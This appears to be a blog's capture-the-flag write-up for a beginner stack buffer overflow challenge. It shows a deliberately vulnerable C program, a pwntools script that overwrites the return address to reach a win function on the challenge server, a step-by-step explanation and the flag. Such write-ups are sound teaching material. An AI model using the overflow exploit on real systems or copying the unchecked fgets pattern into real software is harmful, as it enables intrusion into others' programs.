HomeBlogGithub

Full Buffer Developer

~# cat Question

Do you have what it takes to become a full STACK developer?

nc challs.nusgreyhats.org 55432

FILES: full_buffer_developer, full_buffer_developer.c

full_buffer_developer.c

#include <stdio.h>
#include <stdlib.h>

int win() {
    printf("Good job :)\n");
    system("cat flag.txt");
    return 0;
}

int main() {
    char name[0x10];
    //fix buffer for remote
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    printf("Is this stack overflow?\n");
    printf("Enter username:\n");
    fgets(name, 0x20, stdin);
    printf("Access denied >:(\n");
    return 0;
}

Once again, we needed to exploit a buffer overflow vulnerability to execute the win function and print the contents of flag.txt.

Understanding the script

  • Vulnerability: The main function declares a buffer name with a size of 0x10 bytes (16 bytes). However, it reads up to 0x20 bytes (32 bytes) into this buffer using fgets, causing a buffer overflow.

  • Objective: The objective is to overwrite the return address of the main function on the stack with the address of the win function, so that when main returns, it jumps to the win function instead.

Exploit

from pwn import *

p = remote("challs2.nusgreyhats.org", 55432)

payload = b"A" * 0x10  # fill input buffer
payload += b"A" * 0x8  # fill saved rbp
payload += p64(0x00000000004011bb)  # 64-bit encode address to win

p.sendline(payload)

p.interactive()

Overview:

  1. The exploit script connects to the remote server challs2.nusgreyhats.org on port 55432.

  2. It constructs a payload that overflows the name buffer and overwrites the return address with the address of the win function (0x00000000004011bb in this case).

Sending the payload:

  1. The script sends the payload to the server using p.sendline(payload).

  2. When the server receives the payload and overflows the name buffer, it overwrites the return address on the stack with the address of the win function.

Executing the win function:

  1. After overwriting the return address, when the main function tries to return, it instead jumps to the win function.

  2. The win function is executed, printing "Good job :)" and the contents of flag.txt, which is the flag for the CTF challenge.

In summary, this challenge involved a buffer overflow vulnerability in the program. By sending a specially crafted input, the return address of the main function is overwritten, causing the program to jump to a "win" function that prints the flag.

Flag: flag{y0u_4r3_n0w_fu11_st4ck_d3v_h3h3}

Previousgive it your allNextKage Bushin No Jutsu

Last updated